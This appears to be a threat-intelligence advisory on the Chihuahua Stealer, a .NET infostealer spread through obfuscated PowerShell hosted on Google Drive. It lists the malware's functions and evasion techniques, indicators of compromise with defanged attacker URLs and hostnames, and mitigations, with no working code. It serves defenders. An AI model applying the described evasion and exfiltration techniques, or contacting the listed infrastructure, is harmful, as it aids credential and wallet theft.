PowerShell-Delivered Chihuahua Stealer Distributed via Google Drive Targets Credentials and Wallets
Threat Group: Unknown
Threat Type: Infostealer Malware
Exploited Vulnerabilities: None (Relies on social engineering and legitimate services)
Malware Used: Chihuahua Stealer
Threat Score: π΄ High (7.8/10) β Due to its advanced encryption techniques, stealthy multi-stage execution, and targeting of sensitive data such as browser credentials and cryptocurrency wallets.
Last Threat Observation: May 13, 2025 β G DATA Security Blog
Overview
Chihuahua Stealer is a newly identified .NET-based infostealer that combines common malware techniques with advanced capabilities to exfiltrate sensitive data from compromised Windows systems. The infection begins with an obfuscated PowerShell script delivered through a Google Drive link. Once executed, the malware initiates a multi-stage payload delivery chain designed for persistence and stealth.
This threat targets browser-stored credentials and crypto wallet extensions. The stolen data is compressed, encrypted using AES-GCM via Windows Cryptography API: Next Generation (CNG), and then exfiltrated over HTTPS. Chihuahua Stealer demonstrates an elevated level of sophistication through its use of legitimate encryption APIs and a detailed system cleanup process.
Key Details
Delivery Method: Obfuscated PowerShell script distributed via Google Drive
Target: Windows systems (browser credentials and crypto wallets)
Functions:
- Multi-stage payload execution using PowerShell loaders
- Scheduled task creation for persistence under disguised task names
- Data harvesting from Chromium-based browsers (e.g., Chrome, Edge, Brave)
- Targeting of crypto wallets including MetaMask, Exodus, and Binance extensions
- Extraction of browser autofill information, cookies, and login data
- Compression of stolen data into archive files
- AES-GCM encryption of stolen archives using Windows CNG API
- Exfiltration of encrypted data over HTTPS via hardcoded C2 endpoints
- Collection of system-specific identifiers for victim fingerprinting
- Self-deletion and cleanup mechanisms to avoid post-infection detection
Obfuscation Techniques:
- Base64-encoded script blocks with layered decoding stages
- Hexadecimal string encoding to bypass static signature detection
- Use of Windows-native utilities to blend into normal operations
- Registration of scheduled jobs mimicking legitimate system tasks
- Dynamic loading of .NET assemblies in memory without writing to disk
Attack Vectors
The infection vector leverages social engineering, luring users to execute a malicious PowerShell script hosted on Google Drive. This script acts as the first stage in a chain of payloads that fetch and deploy further components to establish a foothold on the system. The malware creates scheduled tasks to ensure persistence and disguises its activity using encoding techniques. Exfiltration is conducted over HTTPS, bypassing traditional perimeter defenses by mimicking legitimate traffic.
Attackers exploit user trust in cloud-based services to distribute the initial script, taking advantage of the perceived legitimacy of Google Drive URLs to avoid detection by email filters and web proxies. Once the script is executed, it performs system reconnaissance and connects to command-and-control (C2) infrastructure for downloading additional payloads.
The payloads are dynamically loaded in memory to avoid dropping artifacts on disk. Scheduled tasks are registered under misleading names to reduce user suspicion and evade administrative review. The malware avoids redundant infections by fingerprinting the host system and tagging the exfiltrated data with unique victim identifiers.
Chihuahua Stealer also disables telemetry and logging services on the host where possible and uses encryption and HTTPS to make its traffic indistinguishable from benign network communications. This layered evasion approach makes it particularly challenging for traditional endpoint detection and response (EDR) tools to identify and mitigate infections in their early stages.
Known Indicators of Compromise (IoCs)
FileHash-MD5
- cdfdc1fde47a5d2899cf09d4c01e00e9
FileHash-SHA1
- db1d4986391052ad620adef9eb0c181a8ace5c57
FileHash-SHA256
- afa819c9427731d716d4516f2943555f24ef13207f75134986ae0b67a0471b84
- c9bc4fdc899e4d82da9dd1f7a08b57ac62fc104f93f2597615b626725e12cae8
URL
- hxxps://flowers[.]hold-me-finger[.]xyz/index2[.]php
- hxxps://onedrive[.]office-note[.]com/res?a=c&b=&c=8f2669e5-01c0-4539-8d87-110513256828&s=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiI4YTJlNmI1MDQ4M2E5MWYyODkz
domain
- cat-watches-site[.]xyz
hostname
- cdn[.]findfakesnake[.]xyz
- flowers[.]hold-me-finger[.]xyz
- onedrive[.]office-note[.]com
Mitigation and Prevention
User Awareness: Provide security training regarding phishing and unsafe scripts.
Email Filtering: Use advanced filters to block suspicious links or attachments.
Antivirus Protection: Ensure signatures are updated to detect obfuscated PowerShell and .NET malware.
Two-Factor Authentication (2FA): Enforce 2FA for all remote and sensitive system access.
Monitor Logs: Regularly monitor PowerShell execution and scheduled task creation logs.
Regular Updates: Apply security patches and OS updates promptly.
Risk Assessment
Chihuahua Stealer poses a high risk to individuals and organisations storing credentials and cryptocurrency wallets in browser environments. Its reliance on encrypted exfiltration, multi-stage obfuscation, and scheduled persistence mechanisms complicates detection and remediation. Proactive threat hunting and behavioural monitoring are recommended.
Conclusion
Chihuahua Stealer exemplifies the continuing evolution of .NET malware threats, combining layered obfuscation, encrypted exfiltration, and system persistence into a potent infostealer. As attackers turn to cloud-hosted scripts and system-native APIs, defenders must remain vigilant with a layered security approach.
Sources:
- G DATA Security Blog β Sit, Fetch, Steal - Chihuahua Stealer: A New Breed of Infostealer
- OTX AlienVault - Indicators of Compromise (IoCs)